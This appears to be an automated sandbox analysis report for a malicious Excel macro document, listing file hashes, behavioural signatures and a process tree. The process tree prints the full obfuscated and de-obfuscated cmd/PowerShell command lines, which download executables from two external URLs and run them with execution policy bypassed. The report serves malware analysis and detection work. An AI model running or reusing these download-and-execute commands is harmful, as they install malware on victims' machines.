Analysis
max time kernel: 26s
max time network: 17s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 22-07-2024 22:18
Behavioral task: behavioral1
Sample: 522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
Resource: win7-20240705-en

Behavioral task: behavioral2
Sample: 522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
Resource: win10v2004-20240704-en
General
Target: 522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
Size: 50KB
MD5: be48c26f93d365d34256f295518f7c5f
SHA1: 678bcb970e4b656ab4de7d92b3937d071f0fbf11
SHA256: 522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595
SHA512: a1d865d727fa270b759513e5472588b3045d948d4218a4043cfe3537a24231f5c93087da0eb8c7c4887c032e80693796858ba71d111373277a2e020bd19e5c5f
SSDEEP: 768:cnvd4joBriV7prNEPrW+L7uXjNyEnQm0:cmjoBri3mzhPUJyY
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1672 | 1732 | CMd.exe | 29

Blocklisted process makes network request (1 IoC)
flow | pid | Process
6 | 564 | powershell.exe

pid | Process
564 | powershell.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry (2 TTPs, 1 IoC)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
1732 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid | Process
564 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 564 | powershell.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
1732 | EXCEL.EXE
1732 | EXCEL.EXE
1732 | EXCEL.EXE

Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 1732 wrote to memory of 1672 | 1732 | EXCEL.EXE | 30
PID 1732 wrote to memory of 1672 | 1732 | EXCEL.EXE | 30
PID 1732 wrote to memory of 1672 | 1732 | EXCEL.EXE | 30
PID 1732 wrote to memory of 1672 | 1732 | EXCEL.EXE | 30
PID 1672 wrote to memory of 564 | 1672 | CMd.exe | 32
PID 1672 wrote to memory of 564 | 1672 | CMd.exe | 32
PID 1672 wrote to memory of 564 | 1672 | CMd.exe | 32
PID 1672 wrote to memory of 564 | 1672 | CMd.exe | 32
Processes

[depth 1] C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\522821904c650085320f9a9f229b69b9d61dd96cb5ea30782f62726f3dabf595.xls
    PID: 1732
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\SysWOW64\CMd.exe
      Command line: CMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://berurn.com/videos.exe},{http://rejmed.cz/tmp/visa.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"
      PID: 1672
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://berurn.com/videos.exe},{http://rejmed.cz/tmp/visa.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }
        PID: 564
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken